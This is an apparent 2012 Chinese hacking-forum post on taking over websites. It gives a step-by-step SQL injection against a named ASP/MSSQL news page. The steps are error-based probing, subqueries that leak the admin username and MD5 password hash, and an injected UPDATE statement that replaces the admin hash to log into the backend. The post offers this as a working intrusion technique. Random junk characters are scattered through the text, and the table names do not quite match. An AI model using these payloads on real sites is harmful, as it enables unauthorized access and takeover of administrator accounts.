经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
: X) s/ R- x) f+ t# t" h- _可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
$ R: n. @4 v4 I+ }$ b测试如下:* c8 y% t O- v. g5 ^( E
http://www.tmdsb.com/news.asp?id=121
8 D6 z5 \% X$ @6 J* t# v在地址后输入单引号,显示# \; t$ a6 R p8 S4 m' j
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’, s/ {6 ~9 G- i: k. L
字符串 ’’’ 之前有未闭合的引号( m, Z: i: w# m6 f. Q) y M: v
/news/tmdws.asp,行631 C5 D( J2 s0 S; N9 y& p: l. p& g# }
说明没有过滤单引号且数据库是MSSQL.7 _* I$ }, V$ o x2 m' x z
and 1=1正常。and 1=2出错。肯定存在注入. k* {4 @4 W& D3 m/ @
接着输入# \, A$ R: |0 ?# U9 |8 R
http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
" y6 Z- r# e9 O8 m4 q" j* _得到帐号为:admin
) u1 W' f) e) w) Z* hhttp://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)
- I$ w" Y( W: b" F$ t0 C得到密码为:a4716077c2ba075c
0 s- a1 z7 Q9 j1 q; p9 [; t接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433 d+ M( D4 x* C; \+ H! y
命令如下 :
8 T4 z2 `3 B0 }% ~;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
9 }& G7 `7 G0 G4 B这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41